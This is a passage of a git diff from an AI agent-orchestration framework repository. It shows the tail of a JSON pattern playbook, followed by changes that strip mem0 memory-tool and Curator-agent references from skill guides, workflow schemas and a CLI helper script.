due to unverified exit code claims. Comprehensive inaccuracy is worse than acknowledged incompleteness because it breaks downstream automation silently.", - "code_example": "```markdown\n# ❌ DANGEROUS: 190 lines unverified\n## Exit Codes (UNVERIFIED)\n- 0: Success\n- 2: Invalid args ← WRONG\n...180 more unverified lines...\n# Result: CI/CD breaks silently\n\n# ✅ SAFE: 50 lines verified\n## Exit Codes (VERIFIED 2025-10-27)\n- 0: Success\n- 1: Failure\n**Note**: Verify for production: `cmd; echo $?`\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T13:12:08.809242Z", - "last_used_at": "2025-10-27T13:12:08.809242Z", - "related_bullets": [ - "doc-0002", - "doc-0008", - "doc-0005" - ], - "tags": [ - "documentation-quality", - "anti-pattern", - "false-authority", - "verification", - "accuracy-over-volume", - "ci-cd-safety" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-0023", - "content": "Type-Annotated Documentation Placeholders: In CLI documentation, use '' format instead of bare '' to prevent copy-paste errors when visual form contradicts runtime type expectations. Critical for ID parameters where '' doesn't convey integer vs string distinction. Example: 'review_id: int' shows users the parameter expects integer type, preventing string-to-int conversion errors. This pattern makes type contracts explicit in documentation, reducing user errors from ambiguous placeholder syntax. Particularly important when documentation serves as copy-paste source for automation scripts.", - "code_example": "```markdown\n# ❌ AMBIGUOUS - Type not specified\n## Usage\nmark-review-complete \n\n# User copies literally, runtime fails:\n$ mark-review-complete \"abc123\" approved\nTypeError: review_id must be integer, got str\n\n# ✅ TYPE-ANNOTATED - Clear type contract\n## Usage\nmark-review-complete \n\n# User sees type requirement in docs:\n$ mark-review-complete 12345 approved # Correct: integer ID\n\n# Alternative format for optional parameters:\nmark-review-complete [--notes: str]\n\n# Code example showing parameter handling:\n@app.command('mark-review-complete')\ndef mark_complete(\n review_id: int = typer.Argument(...), # Type matches docs\n status: str = typer.Argument(...),\n notes: str = typer.Option(None, '--notes')\n):\n # Implementation matches documented signature\n pass\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T18:25:19.620391Z", - "last_used_at": "2025-10-27T18:25:19.620398Z", - "related_bullets": [ - "doc-0006" - ], - "tags": [ - "documentation", - "cli", - "type-safety", - "user-errors", - "parameter-specification" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "doc-mcp-integration", - "content": "MCP Tool Integration Documentation Pattern: When documenting MCP tool integration in agent templates, use consistent 4-section structure across all agents: 1) When to Use (8+ examples with pattern matching), 2) Decision Context (how to decide when tool applies), 3) Thought Structure (expected output format from tool), 4) What to Look For (verification criteria). Apply identical structure to all agents using same MCP tool. Reduces cognitive load, enables pattern verification. Evidence: 8 MCP patterns documented with consistent structure made review trivial.", - "code_example": "```markdown\n## When to Use {Tool}\n- Pattern 1: [specific scenario]\n(minimum 8 patterns)\n\n## Decision Context\n1. Condition A (with threshold)\n(minimum 6 criteria)\n```", - "related_to": [ - "doc-0010" - ], - "tags": [ - "mcp-tools", - "documentation-structure", - "agent-templates", - "cognitive-load" - ], - "helpful_count": 1, - "last_used": "2025-10-28T14:38:42.143921" - } - ] - }, - "RESEARCH_METHODOLOGY": { - "description": "Proven methodologies for technical research, verification, and knowledge discovery", - "bullets": [ - { - "id": "res-0001", - "content": "Three-Source Verification for Technical Research: When documenting tool behavior, library APIs, or technical specifications, use triangulation methodology combining (1) cipher_memory_search for existing cross-project knowledge, (2) context7/deepwiki MCP tools for current authoritative documentation (library APIs, framework guides), (3) bash commands for empirical verification on available platform (test -f for file claims, grep for code patterns, wc for quantities). Each source provides different confidence level: cipher (proven in production), docs (authoritative but potentially outdated), empirical (platform-specific but definitive). Triangulation catches documentation rot, prevents hallucination, and grounds recommendations in verifiable evidence. Mark verification level explicitly (VERIFIED, RESEARCHED, EXPECTED) so consumers understand claim strength.", - "code_example": "```markdown\n## Three-Source Verification Example\n\n### Research Question: Does MAP framework support custom agent roles?\n\n**Source 1 - Cipher Memory Search**:\n```bash\ncipher_memory_search(query=\"MAP framework custom agent roles\")\n# Result: No existing knowledge found\n# Confidence: UNKNOWN (no prior evidence)\n```\n\n**Source 2 - Authoritative Documentation** (context7/deepwiki):\n```bash\ndeepwiki_ask_question(\n repo=\"azalio/map-framework\",\n question=\"How to create custom agent roles beyond Actor/Monitor/Evaluator?\"\n)\n# Result: README mentions \"extensible agent system\"\n# Confidence: RESEARCHED (documented, not tested)\n```\n\n**Source 3 - Empirical Verification** (bash):\n```bash\n# Verify claim: \"custom agents defined in src/agents/\"\ntest -d src/agents && echo \"✅ Directory exists\" || echo \"❌ FAILED\"\nls src/agents/*.py | wc -l # Count: 7 agent implementations\ngrep -r \"class.*Agent\" src/agents/ # Find base class for custom agents\n# Result: BaseAgent class found with extension points\n# Confidence: VERIFIED (empirically confirmed on darwin platform)\n```\n\n**Final Documentation** (triangulated):\n\"MAP framework supports custom agent roles (VERIFIED). Custom agents extend\nBaseAgent class in src/agents/ (empirically confirmed: 7 implementations found).\nREADME describes system as 'extensible' (RESEARCHED in docs).\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T13:33:55.447315Z", - "last_used_at": "2025-10-23T13:33:55.447323Z", - "related_bullets": [ - "impl-0009", - "impl-0004" - ], - "tags": [ - "research-methodology", - "verification", - "triangulation", - "cipher", - "mcp-tools", - "context7", - "deepwiki", - "bash", - "documentation", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "CI_CD_PATTERNS": { - "description": "Patterns for continuous integration and deployment workflows", - "bullets": [ - { - "id": "ci-cd-0001", - "content": "Fail-Fast Validation Jobs with Dependency Blocking: Create dedicated lightweight validation jobs (version format, syntax checks, required files) that run before expensive operations (test matrix, builds, deployments). Use needs: [validate-job] to block downstream jobs until validation passes. 8-second validation failure is better than 5-minute test matrix failure consuming 4x runner minutes (ubuntu + macos, python 3.11 + 3.12). Place validation jobs at workflow start, make all other jobs depend on them. Prevents wasted CI resources and faster feedback on trivial errors.", - "code_example": "```yaml\n# .github/workflows/ci.yml\njobs:\n validate-version:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - name: Validate semver format\n run: |\n python3 -c \"import tomllib, re, sys; ...\"\n # 8 seconds, fails fast on invalid version\n\n test:\n needs: validate-version # ✅ Blocked until validation passes\n strategy:\n matrix:\n os: [ubuntu-latest, macos-latest]\n python-version: [\"3.11\", \"3.12\"]\n # 5+ minutes, only runs if validation succeeded\n\n build:\n needs: validate-version # ✅ Parallel with test, both blocked\n runs-on: ubuntu-latest\n # 3+ minutes, only runs if validation succeeded\n```", - "tags": [ - "ci-cd", - "github-actions", - "fail-fast", - "optimization", - "validation", - "job-dependencies" - ], - "related_bullets": [], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-26T08:08:24.353122+00:00", - "last_used_at": "2025-10-26T08:08:24.353122+00:00", - "deprecated": false, - "deprecation_reason": null - } - ] - }, - "CLI_TOOL_PATTERNS": { - "description": "Patterns and best practices for building CLI tools distributed via pip", - "bullets": [ - { - "id": "cli-0001", - "content": "Deployment Model as Explicit Requirement: When creating developer tools distributed via pip install, requirements MUST explicitly state accessibility model: 'Must be accessible to pip install users via CLI command' or 'Development-only script (not distributed)'. Agents validate functional correctness (code works) but cannot infer deployment constraints (how users access it). Missing deployment specification causes implementation-integration mismatch: excellent scripts/ implementation (9/10 quality) but inaccessible to pip users (4/10 completeness). Pattern proven: Subtask 7 scripts/validate-dependencies.py worked perfectly in dev but was excluded from pip package distribution. Add to Predictor template: 'How will end users execute this after pip install?' verification question.", - "code_example": "```python\n# ❌ INCOMPLETE REQUIREMENT - Missing deployment model\nrequirement = {\n \"goal\": \"Create dependency validator tool\",\n \"acceptance_criteria\": [\n \"Validates imports against pyproject.toml\",\n \"Reports missing dependencies\",\n \"Exit code 0 for success, 1 for failures\"\n ]\n}\n# Result: Actor implements in scripts/ (dev accessible), \n# but pip install users cannot execute it (not in package)\n\n# ✅ EXPLICIT DEPLOYMENT MODEL - Accessibility specified\nrequirement = {\n \"goal\": \"Create dependency validator tool\",\n \"deployment_model\": \"Must be accessible to pip install users via 'mapify validate-deps' CLI command\",\n \"accessibility_verification\": \"After 'pip install mapify-cli', run 'mapify validate-deps --help' succeeds\",\n \"acceptance_criteria\": [\n \"Validates imports against pyproject.toml\",\n \"Reports missing dependencies\",\n \"Exit code 0 for success, 1 for failures\",\n \"CLI entry point wired in pyproject.toml [project.scripts]\",\n \"Tool accessible via installed CLI command\"\n ]\n}\n# Result: Actor implements with CLI integration (accessible to all users)\n\n# Predictor Verification Checklist (add to template)\n## Deployment Accessibility Check\n- [ ] If requirement says 'CLI tool', verify entry point exists in pyproject.toml\n- [ ] If requirement says 'pip install users', verify not in scripts/ (excluded from distribution)\n- [ ] If dev-only script, verify documented as such (not user-facing)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-27T11:14:58.063144+00:00", - "last_used_at": "2025-10-27T11:14:58.063144+00:00", - "related_bullets": [ - "arch-0010", - "arch-0011" - ], - "tags": [ - "cli-tools", - "pip", - "deployment", - "requirements", - "predictor", - "accessibility", - "python", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - } - ] - } - }, - "bullet_schema": { - "description": "Schema for each bullet in the playbook", - "example": { - "id": "impl-0001", - "content": "Detailed pattern description with context and rationale (minimum 100 characters)", - "code_example": "```python\n# Code demonstrating the pattern\nimport jwt\ntoken = jwt.decode(token, secret, algorithms=['HS256'], verify=True)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-10T00:00:00Z", - "last_used_at": "2025-10-10T00:00:00Z", - "related_bullets": [ - "sec-0012", - "sec-0034" - ], - "tags": [ - "python", - "jwt", - "authentication" - ], - "deprecated": false, - "deprecation_reason": null - } - }, - "usage_instructions": { - "for_actor": "Load relevant bullets via PlaybookManager.get_relevant_bullets(query). Use patterns in implementation. Track used bullet_ids in output.", - "for_reflector": "Analyze which bullets were helpful/harmful. Suggest new bullets for missing patterns. Tag bullets based on effectiveness.", - "for_curator": "Apply delta operations from Reflector insights. Add new bullets, update counters, deprecate harmful patterns. Run deduplication.", - "for_orchestrator": "Load playbook before Actor invocation. Pass relevant bullets as context. Trigger Reflector+Curator after each subtask completion." - }, - "maintenance": { - "deduplication_threshold": 0.9, - "deprecation_threshold": 3, - "sync_to_cipher_threshold": 5, - "max_bullets_per_section": 100, - "cleanup_schedule": "Monthly review of deprecated bullets with harmful_count >= deprecation_threshold" - } -} \ No newline at end of file diff --git a/.claude/references/mcp-usage-examples.md b/.claude/references/mcp-usage-examples.md index 4f1e42d..e42092a 100644 --- a/.claude/references/mcp-usage-examples.md +++ b/.claude/references/mcp-usage-examples.md @@ -4,36 +4,9 @@ Reference examples for task-decomposer agent. Loaded on demand for complex decom --- -## mcp__mem0__map_tiered_search Examples - -**Good Example - Decomposing "Add user authentication"**: -``` -Search: "feature implementation authentication" → find past auth implementations -Search: "task decomposition auth flow" → learn typical subtask breakdown -Result: Discover pattern (from tiered search across branch/project/org): - 1. User model (foundation) - 2. Password hashing (depends on user model) - 3. Login/logout endpoints (depends on password hashing) - 4. Session management (depends on endpoints) - 5. Auth middleware (depends on session) - 6. Protected routes (depends on middleware) - -Use this proven order instead of guessing. -``` - -**Bad Example - Decomposing without historical context**: -``` -Jump directly to listing subtasks -→ Miss critical dependency order (e.g., try to implement middleware before session management exists) -→ Overlook edge cases that past implementations revealed -→ Create subtasks that are too coarse or too granular -``` - ---- - ## sequential-thinking for Reasoning Examples -**When to use**: After mem0 search finds similar features +**When to use**: After finding similar features in existing codebase **Key Difference from Pattern Search**: - Pattern search → **Output**: "Here are the 5 subtasks for authentication" @@ -41,7 +14,7 @@ Jump directly to listing subtasks **Example: Decomposing "Add real-time notifications"** -**Step 1 - mcp__mem0__map_tiered_search (WHAT worked)**: +**Step 1 - Search for similar implementations (WHAT worked)**: ``` Query: "feature implementation notifications" Result: Found 3 past implementations with subtask lists: diff --git a/.claude/references/step-state-schema.md b/.claude/references/step-state-schema.md index 8b5c290..70a52c9 100644 --- a/.claude/references/step-state-schema.md +++ b/.claude/references/step-state-schema.md @@ -61,8 +61,7 @@ Current step set (linear order; some are conditional): 4. `1.56` CHOOSE_MODE 5. `1.6` INIT_STATE 6. `2.0` XML_PACKET -7. `2.1` MEM0_SEARCH -8. `2.2` RESEARCH (conditional) +7. `2.2` RESEARCH (conditional) 9. `2.3` ACTOR 10. `2.4` MONITOR 11. `2.6` PREDICTOR (conditional) diff --git a/.claude/references/workflow-state-schema.md b/.claude/references/workflow-state-schema.md index e490808..c7f7695 100644 --- a/.claude/references/workflow-state-schema.md +++ b/.claude/references/workflow-state-schema.md @@ -47,8 +47,6 @@ INITIALIZED → Workflow started, no subtask active ↓ XML_PACKET_CREATED → AI packet created for current subtask ↓ -CONTEXT_LOADED → mem0 tiered search completed - ↓ RESEARCH_DONE → Research agent completed (if 3+ files) ↓ ACTOR_CALLED → Actor agent generated implementation @@ -73,7 +71,6 @@ WORKFLOW_COMPLETE → All subtasks done, final verification pending Standard step names used in `completed_steps` arrays: - `"xml_packet"` - AI-friendly subtask packet created -- `"mem0_search"` - Context patterns retrieved from mem0 - `"research"` - Research agent analyzed codebase (optional, for 3+ files) - `"actor"` - Actor agent generated implementation - `"monitor"` - Monitor agent validated implementation @@ -109,9 +106,9 @@ Standard step names used in `completed_steps` arrays: "ST-001": ["xml_packet"] }, "pending_steps": { - "ST-001": ["mem0_search", "actor", "monitor", "tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["actor", "monitor", "tests", "linter"], + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -126,12 +123,12 @@ Standard step names used in `completed_steps` arrays: "current_subtask": "ST-001", "current_state": "MONITOR_PASSED", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] }, "pending_steps": { "ST-001": ["tests", "linter"], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } @@ -148,12 +145,12 @@ At this point, workflow-gate.py will **ALLOW** Edit/Write because both "actor" a "current_subtask": "ST-001", "current_state": "SUBTASK_COMPLETE", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-001": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "pending_steps": { "ST-001": [], - "ST-002": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"], - "ST-003": ["xml_packet", "mem0_search", "actor", "monitor", "tests", "linter"] + "ST-002": ["xml_packet", "actor", "monitor", "tests", "linter"], + "ST-003": ["xml_packet", "actor", "monitor", "tests", "linter"] }, "subtask_sequence": ["ST-001", "ST-002", "ST-003"] } diff --git a/.claude/skills/map-cli-reference/SKILL.md b/.claude/skills/map-cli-reference/SKILL.md index 13ba2b5..2a993c4 100644 --- a/.claude/skills/map-cli-reference/SKILL.md +++ b/.claude/skills/map-cli-reference/SKILL.md @@ -1,21 +1,18 @@ --- name: map-cli-reference description: >- - Quick reference for mapify CLI and mem0 MCP usage errors. Use when + Quick reference for mapify CLI usage errors. Use when encountering "no such command", "no such option", "parameter not found", - or when user asks "how to use mapify", "mem0 commands", "validate graph". + or when user asks "how to use mapify", "validate graph". Do NOT use for workflow selection (use map-workflows-guide) or planning methodology (use map-planning). metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP CLI Quick Reference -> **Note (v4.0+):** Pattern storage and retrieval uses mem0 MCP (tiered namespaces). - Fast lookup for commands, parameters, and common error corrections. **For comprehensive documentation**, see: @@ -26,16 +23,6 @@ Fast lookup for commands, parameters, and common error corrections. ## Quick Command Index -### Pattern Search (mem0 MCP) - -```bash -# Tiered search across namespaces (branch → project → org) -mcp__mem0__map_tiered_search(query="JWT authentication", limit=5) - -# Use section_filter when you know the category -mcp__mem0__map_tiered_search(query="input validation", section_filter="SECURITY_PATTERNS", limit=10) -``` - ### Validate Commands ```bash @@ -75,58 +62,6 @@ mapify upgrade **Solution**: - The `playbook` command was removed in v4.0+ -- For pattern retrieval: use `mcp__mem0__map_tiered_search` -- For pattern writes: use `Task(subagent_type="curator", ...)` - ---- - -### Error 2: MCP Tool Not Available - -**Issue**: mem0 calls return empty results or tool invocation fails. - -**Solution**: -- Verify mem0 MCP is configured and enabled in `.claude/mcp_config.json` (or Claude settings) -- Confirm the org/project/branch namespaces match your workflow conventions - ---- - -### Error 3: Wrong Approach (CRITICAL) - -❌ **WRONG**: Writing patterns directly (ad-hoc scripts / manual storage) - -✅ **CORRECT**: Use Curator agent: - -```bash -Task(subagent_type="curator", ...) -``` - -Curator must: -- Search duplicates first via `mcp__mem0__map_tiered_search` -- Store new patterns via `mcp__mem0__map_add_pattern` -- Archive outdated patterns via `mcp__mem0__map_archive_pattern` - ---- - -## Integration with MAP Workflows (v4.0+) - -### Curator Agent - -**Role**: Stores patterns in mem0 MCP - -**Workflow**: -1. Curator analyzes reflector insights -2. Checks for duplicates via `mcp__mem0__map_tiered_search` -3. Stores new patterns via `mcp__mem0__map_add_pattern` -4. Archives outdated patterns via `mcp__mem0__map_archive_pattern` - -### Reflector Agent - -**Role**: Searches for existing patterns before extracting new ones - -**MCP tool used**: -```bash -mcp__mem0__map_tiered_search(query="error handling", limit=5) -``` --- @@ -156,10 +91,9 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Actions:** 1. Identify error type — removed command usage -2. Explain: `playbook` command was removed in v4.0+, replaced by mem0 MCP -3. Provide replacement: `mcp__mem0__map_tiered_search` for reads, `Task(subagent_type="curator", ...)` for writes +2. Explain: `playbook` command was removed in v4.0+ -**Result:** User switches to mem0 MCP tools, error resolved. +**Result:** User acknowledges the removed command. ### Example 2: Validating a dependency graph @@ -172,28 +106,15 @@ mcp__mem0__map_tiered_search(query="error handling", limit=5) **Result:** User validates their task plan and fixes dependency issues before running workflow. -### Example 3: mem0 MCP not responding - -**User says:** "mem0 tiered search returns empty results" - -**Actions:** -1. Check mem0 MCP configuration in `.claude/mcp_config.json` -2. Verify namespace conventions (org/project/branch) -3. Test with broad query: `mcp__mem0__map_tiered_search(query="test", limit=1)` - -**Result:** User identifies configuration issue and restores mem0 connectivity. - --- ## Troubleshooting | Issue | Cause | Solution | |-------|-------|----------| -| `No such command 'playbook'` | Removed in v4.0+ | Use `mcp__mem0__map_tiered_search` for pattern retrieval | +| `No such command 'playbook'` | Removed in v4.0+ | Command no longer available | | `No such option '--output'` | Wrong subcommand syntax | Check `mapify --help` for valid options | -| mem0 tool invocation fails | MCP server not configured | Add mem0 to `.claude/mcp_config.json` and restart | | `validate graph` exit code 2 | Malformed JSON input | Validate JSON with `python -m json.tool < file.json` | -| Patterns not persisting | Writing directly instead of via Curator | Always use `Task(subagent_type="curator", ...)` for pattern writes | | `mapify init` overwrites files | Using `--force` flag | Omit `--force` to preserve existing configuration | --- diff --git a/.claude/skills/map-cli-reference/scripts/check-command.sh b/.claude/skills/map-cli-reference/scripts/check-command.sh index 216c959..f7efaa4 100755 --- a/.claude/skills/map-cli-reference/scripts/check-command.sh +++ b/.claude/skills/map-cli-reference/scripts/check-command.sh @@ -31,11 +31,11 @@ if [ -z "$SUBCOMMAND" ]; then echo " validate - Validate dependency graphs" echo "" echo "Removed subcommands:" - echo " playbook - Removed in v4.0+ (use mem0 MCP)" + echo " playbook - Removed in v4.0+" exit 1 fi -# Removed subcommands (replaced by mem0 MCP in v4.0+) +# Removed subcommands REMOVED_COMMANDS="playbook" # Known valid commands @@ -44,16 +44,7 @@ VALID_COMMANDS="init check upgrade validate" # Check removed commands first for dep in $REMOVED_COMMANDS; do if [ "$SUBCOMMAND" = "$dep" ]; then - echo "ERROR: '$SUBCOMMAND' was removed in v4.0+ (use mem0 MCP instead)" - echo "" - echo "Replacements:" - case "$SUBCOMMAND" in - playbook) - echo " Pattern retrieval: mcp__mem0__map_tiered_search(query=\"...\", limit=5)" - echo " Pattern storage: Task(subagent_type=\"curator\", ...)" - echo " Pattern archival: mcp__mem0__map_archive_pattern(...)" - ;; - esac + echo "ERROR: '$SUBCOMMAND' was removed in v4.0+" exit 2 fi done diff --git a/.claude/skills/map-workflows-guide/SKILL.md b/.claude/skills/map-workflows-guide/SKILL.md index 6e5a1e5..5ad77c2 100644 --- a/.claude/skills/map-workflows-guide/SKILL.md +++ b/.claude/skills/map-workflows-guide/SKILL.md @@ -11,7 +11,6 @@ version: 1.0 metadata: author: azalio version: 3.1.0 - mcp-server: mem0 --- # MAP Workflows Guide @@ -79,14 +78,12 @@ Answer these 5 questions to find your workflow: - ✅ Basic validation (Monitor checks correctness) - ❌ NO quality scoring (Evaluator skipped) - ❌ NO impact analysis (Predictor skipped entirely) -- ❌ NO learning (Reflector/Curator skipped) +- ❌ NO learning (Reflector skipped) **Trade-offs:** - Saves 50-60% tokens vs full pipeline (every agent per subtask) -- mem0 never improves (no patterns stored) - Knowledge never accumulates - Minimal quality gates (only basic checks) -- Cannot reuse learned patterns in future tasks **Example tasks:** - "Fix a small validation edge case" @@ -121,11 +118,11 @@ Answer these 5 questions to find your workflow: - ✅ Impact analysis (Predictor runs conditionally) - ✅ Tests gate + Linter gate per subtask - ✅ Final-Verifier (adversarial verification at end) -- ✅ **Learning via /map-learn** (Reflector/Curator, optional after workflow) +- ✅ **Learning via /map-learn** (Reflector, optional after workflow) **Optimization strategy:** - **Conditional Predictor:** Runs only if risk detected (security, breaking changes) -- **Batched Learning:** Reflector/Curator run ONCE after all subtasks complete +- **Batched Learning:** Reflector runs ONCE after all subtasks complete - **Result:** 35-40% token savings vs full pipeline while preserving learning - **Same quality gates:** Monitor still validates each subtask @@ -151,7 +148,6 @@ Despite token optimization, preserves: - Per-subtask validation (Monitor always checks) - Complete implementation feedback loops - Full learning (batched, not skipped) -- mem0 pattern growth from all tasks **See also:** [resources/map-efficient-deep-dive.md](resources/map-efficient-deep-dive.md) @@ -171,7 +167,7 @@ Despite token optimization, preserves: - ✅ Validation (Monitor verifies fix) - ✅ Root cause analysis - ✅ Impact assessment (Predictor) -- ✅ Learning (Reflector/Curator) +- ✅ Learning (Reflector) **Specialized features:** - Error log analysis @@ -233,8 +229,7 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Actor** — Writes code and implements - Generates implementation - Makes file changes -- Uses existing patterns from mem0 -- Queries mem0 for relevant knowledge +- Uses existing patterns from previous workflows **Monitor** — Validates correctness - Checks implementation against criteria @@ -263,18 +258,10 @@ MAP workflows orchestrate **12 specialized agents**, each with specific responsi **Reflector** — Pattern extraction - Analyzes what worked and failed - Extracts reusable patterns -- Searches mem0 for existing knowledge via `mcp__mem0__map_tiered_search` -- Prevents duplicate pattern storage +- Prevents duplicate pattern extraction - **Batched in /map-efficient** (runs once at end, via /map-learn) - **Skipped in /map-fast** (no learning) -**Curator** — Knowledge management -- Stores patterns in mem0 via `mcp__mem0__map_add_pattern` -- Deduplicates via tiered search -- Archives outdated patterns via `mcp__mem0__map_archive_pattern` -- Maintains pattern metadata -- **Batched in /map-efficient** (runs once at end) - ### Optional Agent **Documentation-Reviewer** — Documentation validation @@ -389,27 +376,6 @@ Predictor runs if: - High complexity estimated - Multiple files affected -**Q: How does the mem0 tiered memory system work?** - -A: mem0 MCP provides tiered pattern storage: - -**L1 (Branch-scoped)** -- Patterns specific to current feature branch -- Experimental patterns for current work -- Fastest access - -**L2 (Project-scoped)** -- Shared project knowledge -- Validated patterns used across branches -- Standard access - -**L3 (Org-scoped)** -- Cross-project patterns -- Organizational best practices -- Broadest scope - -Search flows: L1 → L2 → L3 (most specific first) - --- ## Resources & Deep Dives @@ -496,10 +462,8 @@ MAP: 📚 Loads this skill for context 1. **Default to /map-efficient** — It's the recommended choice for 80% of tasks 2. **Use /map-fast sparingly** — Only for small, low-risk changes with clear scope 3. **Use /map-efficient for critical paths** — Describe risk context in the task description for appropriate Predictor triggers -4. **Monitor pattern growth** — Use mem0 search to see learning improving -5. **Trust the optimization** — /map-efficient preserves quality while cutting token usage -6. **Review deep dives** — When in doubt, check the appropriate deep-dive resource -7. **Leverage mem0 patterns** — Stored patterns from previous tasks via tiered search +4. **Trust the optimization** — /map-efficient preserves quality while cutting token usage +5. **Review deep dives** — When in doubt, check the appropriate deep-dive resource --- @@ -555,7 +519,6 @@ MAP: 📚 Loads this skill for context | Wrong workflow chosen mid-task | Cannot switch workflows during execution | Complete current workflow, then restart with correct one | | Predictor never runs in /map-efficient | Subtasks assessed as low-risk | Expected behavior; Predictor is conditional. Use /map-debug for guaranteed analysis | | No patterns stored after /map-fast | /map-fast skips learning agents | By design — use /map-efficient + /map-learn for pattern accumulation | -| mem0 search returns empty | mem0 MCP not configured or namespaces mismatch | Verify mem0 in `.claude/mcp_config.json`, check namespace conventions | | Skill suggests wrong workflow | Description trigger mismatch | Check skill-rules.json triggers; refine query wording | --- diff --git a/.claude/skills/map-workflows-guide/resources/agent-architecture.md b/.claude/skills/map-workflows-guide/resources/agent-architecture.md index d4a8d25..1b8b212 100644 --- a/.claude/skills/map-workflows-guide/resources/agent-architecture.md +++ b/.claude/skills/map-workflows-guide/resources/agent-architecture.md @@ -1,6 +1,6 @@ # Agent Architecture -MAP Framework orchestrates 12 specialized agents in a coordinated workflow. +MAP Framework orchestrates 11 specialized agents in a coordinated workflow. ## Agent Categories @@ -14,7 +14,7 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. **2. Actor** - **Role:** Implements code changes -- **Input:** Subtask description, acceptance criteria, mem0 pattern context +- **Input:** Subtask description, acceptance criteria - **Output:** Code changes, rationale, test strategy - **When it runs:** For each subtask (multiple times if revisions needed) @@ -53,16 +53,6 @@ MAP Framework orchestrates 12 specialized agents in a coordinated workflow. - **When it runs:** - /map-efficient, /map-debug, /map-debate: Batched (once at end, via /map-learn) - /map-fast: Never (skipped) -- **MCP Tool:** Uses `mcp__mem0__map_tiered_search` to check for existing patterns - -**7. Curator** -- **Role:** Updates memory with validated patterns -- **Input:** Reflector insights -- **Output:** Delta operations (ADD/UPDATE/ARCHIVE patterns) -- **When it runs:** After Reflector -- **MCP Tools:** - - `mcp__mem0__map_tiered_search` to deduplicate - - `mcp__mem0__map_add_pattern` to store new patterns ### Optional @@ -121,7 +111,7 @@ TaskDecomposer ↓ Final-Verifier (adversarial verification of entire goal) ↓ - Done! Optional: /map-learn → Reflector → Curator + Done! Optional: /map-learn → Reflector ``` ### Multi-Variant Pipeline (map-debate) @@ -135,7 +125,7 @@ TaskDecomposer Monitor → [Predictor if high risk] → Apply changes ↓ Batch learning (via /map-learn): - Reflector (all subtasks) → Curator → Done + Reflector (all subtasks) → Done ``` --- @@ -193,7 +183,6 @@ Otherwise: Skipped (token savings) ### Workflow State - All subtask results - Aggregated patterns (Reflector) -- mem0 delta operations (Curator) --- @@ -223,8 +212,8 @@ Agents communicate via structured JSON: - Actor iterates (max 3-5 attempts) - If still failing: Mark subtask as failed, continue with others -### MCP Tool Failures -- Reflector/Curator gracefully degrade +### Learning Failures +- Reflector gracefully degrades - Learning skipped but implementation continues - Logged to stderr for debugging @@ -242,7 +231,6 @@ Agents communicate via structured JSON: | Evaluator | ~0.8K | Per subtask | map-debug, map-review | | Predictor | ~1.5K | Per subtask or conditional | Varies | | Reflector | ~2K | Per subtask or batched | Varies | -| Curator | ~1.5K | After Reflector | Varies | | Debate-Arbiter | ~3-4K | Per subtask | map-debate only | | Synthesizer | ~2K | Per subtask | map-efficient (--self-moa) | | Research-Agent | ~2-3K | Once (before Actor) | map-plan, map-efficient, map-debug | @@ -251,7 +239,7 @@ Agents communicate via structured JSON: **map-efficient savings:** - Skip Evaluator: ~0.8K per subtask - Conditional Predictor: ~1.5K per low-risk subtask -- Batch Reflector/Curator: ~(N-1) × 3.5K for N subtasks +- Batch Reflector: ~(N-1) × 2K for N subtasks --- diff --git a/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md index 37e5aab..959e188 100644 --- a/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-debug-deep-dive.md @@ -39,7 +39,7 @@ - How was it fixed? - How to prevent similar bugs? -4. Curator documents: + Reflector also documents: - Debugging techniques used - Common pitfalls - Prevention strategies @@ -152,9 +152,6 @@ Reflector: ├─ Solution: "Use mutex for critical sections" └─ Prevention: "Design for immutability" -Curator: -├─ ADD "debug-0042: Async race condition patterns" -└─ ADD "impl-0099: Use immutable state updates" ``` --- @@ -221,7 +218,7 @@ Root cause: Improper async error handling 2. What test was missing? 3. What pattern should we follow? -**Curator documents:** +**Reflector documents:** ```json { "type": "TESTING_STRATEGY", diff --git a/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md b/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md index 1e69fbf..6a2afb0 100644 --- a/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md +++ b/.claude/skills/map-workflows-guide/resources/map-efficient-deep-dive.md @@ -34,15 +34,15 @@ Subtask 3: Add unit tests (tests/auth.test.ts) → Predictor: ⏭️ SKIPPED (test file, no side effects) ``` -### Reflector/Curator: Batched Learning +### 